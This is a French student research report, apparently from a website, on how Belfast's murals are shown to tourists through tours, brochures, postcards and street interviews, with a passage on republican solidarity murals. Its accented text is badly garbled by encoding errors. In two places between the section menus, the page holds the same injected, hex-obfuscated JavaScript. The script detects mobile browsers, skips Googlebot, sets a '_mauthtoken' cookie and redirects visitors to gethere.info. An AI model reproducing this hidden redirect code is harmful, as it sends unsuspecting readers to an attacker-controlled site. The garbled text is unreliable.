Les diffA�rents guides na��hA�sitaient pas non plus A� nous encourager A� prendre des photos des deux murals ou, comme dans le cas du Peace Wall, signer nos noms sur a�?the biggest guestbook in Belfasta�? selon notre guide. Ca��est une pratique assez populaire et cela semble A?tre trA?s encouragA� par les agents touristiques.
Lors des multiples tours dans les diffA�rents quartiers de West Belfast, nous avons remarquA� da��autres groupes de touristes qui suivaient des guides. Beaucoup da��entre eux s’arrA?taient devant les murals et prenaient des photos. Nous avons observA� ce phA�nomA?ne A� plusieurs reprises, surtout devant le mural de Bobby Sands, le PeaceWall, le International Peace Wall ainsi que da��autres fresques comme le King of Orange ou celle de Stevie A� Top Gun A� McKeag.

Documentations touristiques et souvenirs

a�? Implication dans notre travail
Au fil de notre sA�jour aI� Belfast, nous avons rA�coltA� divers documents concernant la��offre touristique. Office du tourisme, boutiques, musA�es ; A� chaque opportunitA� donnA�e, nous avons collectionnA� des documents destinA�s aux touristes ayant trait aux muralsA� : brochures publicitaires, plans pour touristes, cartes postales, etc.
Notre but, A� travers la rA�colte de souvenirs et documents touristiques A�tait de nous faire une idA�e de la��image-type des murals envoyA�e aux touristes. En effet, les flyers et brochures cherchent aI� attirer la��A�il des visiteurs, et de leur vendre quelque chose : une attraction, un circuit, etc. Ces divers A�lA�ments marketing sont donc un outil pertinent pour dA�terminer la maniA?re dont les murals sont vendus aux touristes. Ce qui y est prA�sentA� est le A�pittoresqueA� : ce que les touristes doivent impA�rativement avoir vu et photographiA�.

A� Le touriste identifie un lieu […] comme pittoresque parce qua��il la��a dA�jA� vu et qua��il peut le comparer A� ce qua��il connaA�t dA�jA�, soit par son expA�rience, soit grA?ce aux images qui en existent A�1

On comprend donc que les divers documents liA�s au tourisme jouent un rA?le clef dans la��entretien da��un cercle da��image, puisqua��ils informent des fresques A� voir. Ainsi le visiteur, une fois sur place, se rendra compte de a�?la��importancea�? du mural devant lequel il se trouve. De part ce dA�jA�-vu, la��A�lA�ment reprA�sentA�, dans notre cas, un mural, lui apparaA�tra comme A�tant pittoresque2, ca��est aI� dire a�?digne da��A?tre vua�? et da��A?tre photographiA�.
La rA�colte des documents nous semblait, en amont des recherches, A?tre un travail titanesque. Mais nous avons trA?s vite A�tA� forcA� de constater que peu de magasins ne vendent des souvenirs et des cartes postales en lien avec les murals. Il en va de mA?me pour les tour-opA�rateurs : seule une poignA�e da��entre eux promeut les murals dans la publicitA� pour leur circuit.

PrA�sentation des types de documents

Les documents que nous avons rA�coltA� se dA�clinent en trois catA�gories:
a�? Flyers, brochures et plans
a�? Cartes Postales
a�? Souvenirs

Dans les trois cas, nous nous sommes concentrA�s sur les documents reprA�sentant des fresques ou des parties de fresques.
Nous avons rA�coltA� au total une vingtaine de brochures rA�pondant A� ces critA?res, ainsi que quelques cartes trouvA�es principalement dans les offices touristiques du centre-ville, les prA�sentoirs de notre auberge, mais aussi au Centre gaA�lique CultA?rlann McAdam OI? Fiaich.
Au niveau des plans distribuA�s gratuitement aux touristes, nous na��en avons trouvA�s aucun qui ne soit pas inondA� de publicitA�. Bien que le cadrage diffA?re lA�gA?rement de la��un A� la��autre, il reste toujours focalisA� sur le centre-ville, avec le quartier du Titanic mis en A�vidence. Les murals ne sont jamais prA�cisA�ment indiquA�s sur les cartes, bien que leurs directions approximatives soit parfois mentionnA�es. Selon le cadrage du plan, les quartiers de Shankill et Falls na��apparaissent mA?me pas. Quant A� East Belfast, il na��est reprA�sentA� qua��une seule fois sur la��ensemble de notre A�chantillon cartographique.
Au fil de nos journA�es A� Belfast, nous avons donc traquA� puis achetA� les cartes postales comportant des photographies de murals. Nous avons toutefois A�tA� forcA� de constater que le choix A�tait restreint. En une semaine, il nous a A�tA� possible de rA�colter six cartes da��intA�rA?t plus ou moins important pour notre recherche dans des lieux divers. Si nous avons trouvA� la premiA?re dans un supermarchA� alimentaire et deux autres dans un bureau de poste, les trois restantes ont A�tA� achetA�es dans deux magasins de souvenirs diffA�rents.

 

Ca��est dans la��optique da��objets tA�moins da��une visite, que nous avons dA�cidA� de nous pencher sur les souvenirs vendus aux touristes visitant la capitale Nord-Irlandaise. Tout comme les cartes postales, nous avons eu beaucoup de peine A� en trouver. Les premiers souvenirs, petites figurines en plA?tre, sur lesquelles figuraient des photographies de murals ont A�tA� trouvA�s dans une petite boutique indA�pendante. Le reste des quelques objets observA�s a A�tA� trouvA� dans le magasin da��une grande chaA�ne de souvenirs irlandais. Ca��est A�galement dans cette boutique que certaines des cartes postales prA�cA�demment prA�sentA�es ont A�tA� trouvA�es.

a�? Observations gA�nA�rales
Da��une maniA?re gA�nA�rale, nous avons A�tA� A�tonnA� de la difficultA� A� trouver des documents traitant des murals destinA�s aux touristes. Si nous avons eu moins de peine A� trouver des brochures vendant des circuits touristiques autour des Troubles, les souvenirs, eux, semblent A?tre quasi-inexistants.
Sur les cartes postales et les souvenirs, tout comme sur les diffeI?rentes brochures et plans, la��accent est mis sur le Titanic ou sur la sA�rie tA�lA�visA�e Games of Thrones.
Lorsque des fresques sont reprA�sentA�es, on constate frA�quemment celle de Bobby Sands ou encore le International Peace Wall. Souvent, notamment sur les souvenirs et les cartes postales, les murals reprA�sentA�s na��existent plus, ou ont A�tA� repeints.

Micro-Trottoirs

a�? RA?le dans notre recherche
Afin de nuancer nos donnA�es se basant principalement sur l’observation de la��offre touristique, nous avons souhaitA� nous confronter A� la vision touristique des locaux sur les murals, vestiges visibles du conflit. Au centre de notre interrogation se trouvait la question : les locaux nous suggA?rent-ils de voir les mA?mes fresques que celles misent en avant par les divers agents touristiques ?
Nous estimons que de tels conseils participent A� la��entretien du cercle da��image.

a�? PrA�sentation de la mA�thode
Nous faisant passer pour des touristes, nous avons demandA� A� des passants quelles A�taient les fresques a�?A� voira�? dans les environs. Pour rester cohA�rent avec la situation, nous avons questionnA� les locaux principalement dans les quartiers les plus susceptibles da��A?tre visitA�s par des touristes intA�ressA�s A� voir des murals, ca��est-A�-dire Falls et Shankill, ainsi qua��au centre ville.
Si ce dernier endroit nous a intA�ressA�s, ca��est de par son aspect a�?neutrea�? face au conflit mais aussi par le fait que la��on na��y trouve aucun mural partisan. Au vu de cette absence, nous A�tions intriguA�s par les rA�ponses que nous obtiendrions lors de nos entretiens spontanA�s ; ca��est-aI�-dire vers quels quartiers et quelles fresques on nous enverrait.
Nous sommes donc allA�s questionner les passants des quartiers de Falls et Shankill, la��un A�tant majoritairement unioniste et la��autre loyaliste.

a�? Retour rA�flexif sur la mA�thode
Si dans un premier temps, cette approche nonchalante et informelle des habitants de Belfast nous a semblA� une bonne idA�e, notamment par le fait de se faire passer pour des visiteurs et ainsi, da��A�viter da��A�ventuels biais qua��aurait instaurA�e la mention da��une recherche dans le cadre acadA�mique, nous avons rapidement A�tA� rattrapA�s par des questionnements da��ordre A�thique.
Nous rassurant derriA?re des semis-vA�ritA�s, nous nous prA�sentions aux locaux comme A�tant en visite quelques jours dans la rA�gion et voulant voir des murals. En soit, ceci na��A�tait pas faux. Nous avons toutefois A�tA� piA�gA� par quelqua��un voulant engager une conversation et demandant ce que nous avions dA�jA� vu depuis notre arrivA�e. Si notre interlocutrice ne la��a probablement pas ressenti, un malaise sa��est installA� entre nous trois, ne sachant pas comment rA�pondre A� cette dame que chaque jour depuis notre arrivA�e en Irlande-du-Nord avait A�tA� consacrA� aux fresques mA?me que celle-ci venait de nous indiquer.
Un autre conflit moral sa��est installA� en nous aprA?s avoir demandA� A� des passants de nous conseiller des fresques, nous ne nous dirigions pas dans la direction indiquA�e. Ce qui nous importait dans le fond, A�tait la rA�ponse donnA�e par les locaux, et non les fresques en elles-mA?mes.
Autre point discutable : A� aucun moment nous na��avons mentionnA� A� nos interlocuteurs que les donnA�es rA�coltA�es serviraient A� la��A�laboration da��un travail acadA�mique qui apparaA�trait en ligne. Bien que la��identification des personnes soit impossible et que nous-mA?me ignorons leur identitA�, cela soulA?ve des questions A�thiques et morales.

a�? RA�sultats
Dans la��ensemble, ce petit A�chantillon peu structurA� da��entretiens ne nous permet pas da��avancer de rA�sultats prA�cis. Toutefois, il est utile pour complA�ter ou nuancer les donnA�es acquises par divers canaux. De plus, il nous a permis une meilleure connaissance du terrain. Voici toutefois les grandes lignes aI� tirer de nos micro-trottoirs :

PremiA?rement, les rA�ponses donnA�es par les locaux nous ont semblA�es dans une premier temps trA?s mA�caniques. Ca��est souvent aprA?s de brA?ves rA�flexions que des A�lA�ments moins automatiques nous ont A�tA� donnA�s.
En effet, si quelqua��un vous aborde dans votre ville et vous demande quelles sont les attractions principales A� ne pas louper, vous rA�pondrez instinctivement les haut-lieux touristiques, avant de donner des conseils plus personnalisA�s et prA�cis.

Ensuite, les trois quartiers de micro-trottoires ne donnent pas les mA?mes rA�sultats. Au centre ville, la plupart des personnes interrogA�es na��ont trA?s souvent pas su nous rA�pondre, nous encourageant a faire un tour en Black Cab. Da��autres nous conseillaient la��International Peace Wall. La diffA�rence majeure entre nos interlocuteurs A� Falls et A� Shankill est que dans la partie rA�publicaine, on nous envoyait trA�s souvent vers le mural de Bobby Sands et la��International Peace Wall. Alors que dans la partie loyaliste, les rA�ponses A�taient plus diverses. Certains nous envoyaient vers les murals les plus proches, da��autres nous mentionnaient la��International Peace Wall ou/et le mural de Bobby Sands, da��autres encore nous conseillaient de nous enfoncer dans de petites ruelles.

Dans les trois quartiers, nous avons trA?s souvent A�tA� envoyA� au International Peace Wall. Celui-ci faisait parti des rA�ponses automatiques : sans hA�sitation, les locaux nous la��ont le plus conseillA�.

De maniA?re gA�nA�rale, nous avons observA�s une certaine rA�ticence A� aborder le sujet, tant dans les quartiers de Shankill et de Falls que au centre ville.
Nous na��avons malheureusement pas eu le temps de mener plus da��entretiens durant notre sA�jour. Toutefois, entre les deux sA�ries de micro-trottoirs que nous avons effectuA�es, on constate une diffA�rence notoire: la mA�tA�o. En effet, nous observons de grandes diffA�rences entre les entretiens du premier jour, pluvieux, et du second jour, ensoleillA�. Celles-ci se manifestent notamment par la durA�e des A�changes ainsi que la disposition de nos interlocuteurs aI� nous parler.

Observations complA?tes

Afin d’avoir une vue d’ensemble de nos observations, cliquez sur le tableau des rA�sultats des observations. Celui-ci recense l’ensemble de nos observations. Y est reprA�sentA� le nombre de fois ainsi que le contexte dans lequel une fresque prA�cises nous A� A�tA� indiquA�e.


1- Gauthier, L., Staszak, J.-F., ClichA� exotiques, Paris, Editions de Monza, 2015, p.59
2- Ibidem



a�? PROBLA�MATISATION

a�? MA�THODOLOGIE

a�? PARTIE THA�MATIQUE
a�? CONCLUSION
A�

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

ProblA�matisation

Roland Barthes A�crivait : A� Je ne sais si, comme le dit le proverbe, les choses rA�pA�tA�es plaisent, mais je crois que du moins elles signifient. A�1. Ainsi, ce sont donc les significations de ces rA�pA�titions qui seront au centre de nos recherches.

Les questions que nous nous posons, dans ce travail sont les suivantes : Quelles reprA�sentations des murals de Belfast alimentent un cercle da��images? Quelles significations ce cercle prend-il dans le contexte post-conflictuel de la ville?

Pour y rA�pondre, nous comptons A�tudier les images visuelles et les discours produits autour du tourisme.
Ainsi, nous A�mettons l’hypothA?se, en nous appuyant sur nos recherches prA�liminaires, que certaines fresques sont particuliA?rement frA�quentes dans la��environnement touristique. Notre but est non seulement de rendre compte de cette redondance da��images et da��identifier de la sorte un cercle da��images, mais aussi de chercher aI�comprendre la��origine et les consA�quences de cette sur-reprA�sentation. Nous envisageons, par exemple, la possibiliteI? que les images des murals da��un cA?tA� du conflit soient davantage mises en avant par rapport A� la��autre.

ClA�ment Cheroux dans son ouvrage Diplopie, identifie des reprA�sentions de thA�matiques similaires prA�sentA�es en boucle dans les mA�dias A�tasuniens, menant ainsi A� la crA�ation de diverses catA�gories da��image-type des attentats contre les tours du World Trade Center, le 11 septembre 20012. Dans une approche similaire, nous nous efforcerons da��identifier des images-types pour les murals de Belfast, ainsi que les thA�matiques que celles-ci illustrent.

Une fois notre A�chantillon final A�tabli, nous nous adonnerons aI�une analyse dA�taillA�e de celui-ci, en questionnant les images le constituant. Comme mentionnA� plus haut, nous nous efforcerons de dA�finir des images-types de murals, aux raisons de leurs prA�sences iconographiques rA�pA�tA�es, A� leurs localisations, etc.
Nos rA�flexions se porteront donc principalement sur les images de murals constituant par leurs rA�pA�titions un cercle plus ou moins fermA�. Le cercle sera formA� da��images partagA�es par des agents touristiques aux visiteurs de la ville, qui sa��en empareront, les partageront A� leur tour autour da��eux, notamment A� travers les rA�seaux sociaux. Ainsi faisant, ils entretiennent la diffusion de la reprA�sentation da��un mural auprA?s de potentiels touristes, et par la mA?me occasion, renforcent la��image promue par les agents touristiques.

La mise en circulation rA�pA�tA�e des reprA�sentations d'un mA?me mural, entre les agents touristiques et les touristes. LA�a Zignani
La mise en circulation rA�pA�tA�e des reprA�sentations d’un mA?me mural, entre les agents touristiques et les touristes.

Notre premiA?re hypothA?se est donc, comme nous venons de le prA�senter, la��existence da��un cercle da��image autour des murals. Nous avanA�ons aussi la possibilitA� que la��un des cA?tA� du conflit passA� soit sur-reprA�sentA� par rapport A� la��autre.

Dans un premier temps, nous prA�senterons donc les mA�thodes employA�es pour la rA�colte de donnA�es. Celles-ci seront mobilisA�es et analysA�es dans une seconde partie, oA? nous reviendrons sur nos hypothA?ses et oA? nous A�laborerons diverses parties thA�matiques.


1- Barthes, R., Mythologies, Paris, Le Seuil, 1957, p.10
2- ChA�roux, C., Diplopie, Paris, Le Point du Jour, 2009, p.22

 


a�? INTRODUCTION

a�? PROBLA�MATISATION

a�? MA�THODOLOGIE

a�? PARTIE THA�MATIQUE
a�? CONCLUSION

 var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

RA�sultats de la recherche – SolidaritA� Internationale

Mesure de la solidaritA� internationale des rA�publicains irlandais

Au niveau spatial, les quartiers dA�finis et habitA�s par une population exclusivement irlandaise ou anglaise, qui sont souvent de classes dA�favorisA�es, sont ceux qui comportent le plus de murals. Les symboles internationaux que l’on peut dA�celer dans l’espace public se trouvent avant tout dans le quartier nationaliste de Falls, un quartier irlandais, A� travers notamment les murals de l’A�A�International WallA�A�. Si les quartiers loyalistes ont eux aussi beaucoup de murals, ils ne font pas rA�fA�rence A� des conflits internationaux, seule une trA?s grande pancarte sur un mur fait rA�fA�rence A� IsraA�l dans le quartier de Shankill. Cela montre que ce sont les rA�publicains irlandais qui ont lancA� un processus d’internationalisation du conflit qui selon Pascal PragnA?re (2009, 2014) a notamment pour fonction de lA�gitimer la lutte rA�publicaine et d’accroA�tre la mobilisation, par le biais de la crA�ation da��identitA�s communes entre les diffA�rents acteurs du conflit. En effet, les rA�fA�rences aux autres luttes permettent une certaine reprA�sentation du conflit contribuant A� marquer la position d’oppressA�s et de victimes des Irlandais. Elles participent ainsi A� renforcer le sentiment d’appartenance A� une communautA� particuliA?re. Enfin les murals, toujours selon Pascal PragnA?re (2009) ont une fonction d’appropriation territoriale, de A�A�marquageA�A� d’un quartier comme appartenant A� une communautA�, A� un camp.

Dans le quartier de Falls, des messages de solidaritA� envers des causes A� l’A�tranger, entre autres pour la Palestine, le Pays Basque ou encore les Kurdes sont diffusA�s A� travers les murals. On trouve A�galement des boutiques vendant toutes sortes de symboles irlandais mais aussi palestiniens et basques par exemple. A premiA?re vue donc, les rA�publicains irlandais semblent soutenir a�� au moins symboliquement a�� toute cause qu’ils considA?rent comme ayant des similitudes avec la leur, c’est A� dire concernant des mouvements politiques et/ou sociaux qui se battent pour leur libA�ration, leur dignitA�.

La question que l’on peut dA?s lors se poser, est de savoir si ces manifestations de solidaritA� s’arrA?tent A� un message symbolique ou si ces signaux visibles dans l’espace public sont suivis d’une relation et da��un soutien plus concrets entre les acteurs Nord-Irlandais et ceux des autres causes qu’ils dA�signent par leur murals, ce sur quoi nous reviendrons plus loin. Il est dA�jA� A�vident, au regard des murals et des articles symboliques trouvA�s dans des magasins ou des musA�es, que certaines causes sont d’avantage supportA�es que d’autres, dans un premier temps, toujours symboliquement. Le drapeau palestinien se retrouve dans tous les magasins pro rA�publicains, ainsi qu’aux fenA?tres de maisons privA�es. La Palestine fait par ailleurs l’objet de deux peintures murales sur l’International Wall au moment de notre enquA?te, alors que les autres causes ne font pas l’objet de doublon. L’un de ces mural est par ailleurs trA?s significatif symboliquementA�:

Solidarity p.o.w.s, Falls Road, Lucien Rappaz, le 01.03.2016
Solidarity p.o.w.s, Falls Road, Lucien Rappaz, le 01.03.2016

Cette peinture murale fait partie de la��International Wall qui est un lieu de tourisme en Irlande du Nord, il regroupe plusieurs murals A� la suite concernant des conflits internationaux. Elle na��est pas toute rA�cente puisqua��elle apparaissait dA�jA� dans le documentaire da��Hassan Alkatib de dA�cembre 2014, nommA� Ireland & Palestine. Ici la similitude entre cause palestinienne et rA�publicaine irlandaise est directement exprimA�e, car les deux sont reprA�sentA�es en un seul mural. Une ouverture carrA�e avec trois barreaux reprA�sente des cellules de prison. Deux bras, habillA�s de chemise, passent entre les barreaux en se donnant la main au milieu du mural. On reconnaA�t l’appartenance A� la nationalitA� irlandaise et la nationalitA� palestinienne aux couleurs des manches, A�quivalentes aux couleurs du drapeau de la��Irlande (vert-blanc-orange) et le drapeau de la Palestine (vert-blanc-noir-rouge).A� Les deux personnages sont exactement mis sur le mA?me plan, et se trouvent prA�cisA�ment dans la mA?me situationA�: emprisonnA�s. Au-dessous de la poignA�e de main, est inscrit SOLIDARITE P.O.W.s. Cet acronyme A�A�P.O.W.sA�A� signifie A�A�Prisonnier de guerreA�A� (Prisoner Of War). Cette inscription place trA?s clairement la��Irlande du Nord et la Palestine du cA?tA� des victimes. Le mural transmet un sentiment de solidaritA� entre les deux peuples opprimA�s, ces deux bras de prisonniers de guerre emprisonnA�s dans leurs cellules sortent un bras pour se serrer la main. Nous interprA�tons la prise de main ferme comme un soutien mutuel qui se dA�gage de la fresque. Le dessin reprA�sente les cellules comme si elles A�taient la��une A� cA?tA� de la��autre. Si un lA�ger trait et quelques boulons semblent dissocier deux bA?timents, le fond gris, sans interruption semble au contraire laisser penser que ces deux prisons n’en font qu’une. Alors que les pays sont trA?s A�loignA�s, on peut interprA�ter que malgrA� la distance gA�ographique leurs causes communes les rapprochent ainsi que leur mA?me sentiment da��injustice et da��oppression.

Nous na��avons pas pu le prouver scientifiquement mais nous pouvons nous interroger sur le fait de savoir si cette fresque n’aurait pas pour fonction de renforcer la mA�moire collective des Nord-Irlandais, car une partie d’entre eux pourraient se reconnaA�tre dans la cause palestinienne en la regardant. Da��aprA?s la��interview da��un chauffeur de Black Cab, la communautA� est souvent impliquA�e dans la conception et la��emplacement de ces murals, les artistes les crA�ent avec la��accord de la communautA�, cela nous confirme qua��il y a une connaissance de la part de certains habitants, tout au moins, des conflits internationaux et une volontA� de leur part de les reprA�senter sur un support mural durable dans le temps, jusqua��A� A?tre recouvert par des conflits plus actuels.

A�Au-delA� da��une solidaritA� symbolique

Outre cette solidaritA� exprimA�e symboliquement, on trouve un magasin totalement dA�diA� A� la cause palestinienne sur Falls road, ce qui n’est pas le cas pour les Basques, Catalans ou autres luttes de libA�ration. Les produits vendus dans cette boutique sont importA�s de Palestine, il s’agit en gA�nA�ral de produits artisanaux typiques, tels que de l’huile d’olive ou du savon. Cela montre qu’il existe des initiatives de soutien concret A� la Palestine, ici un soutien A�conomique. Par ailleurs, il existe un A�change rA�el entre les diffA�rents acteurs autour de ces produits. En effet, non seulement le magasin commande des produits palestiniens, mais les Palestiniens eux-mA?mes produisent A�galement des articles qui pourraient plaire aux Irlandais, par exemple des bijoux aux symboles celtiques. Il y a lA� une hybridation dans la mesure oA? certains de ces bijoux sont fait en bois da��olivier et reprA�sentent des symboles celtiques.

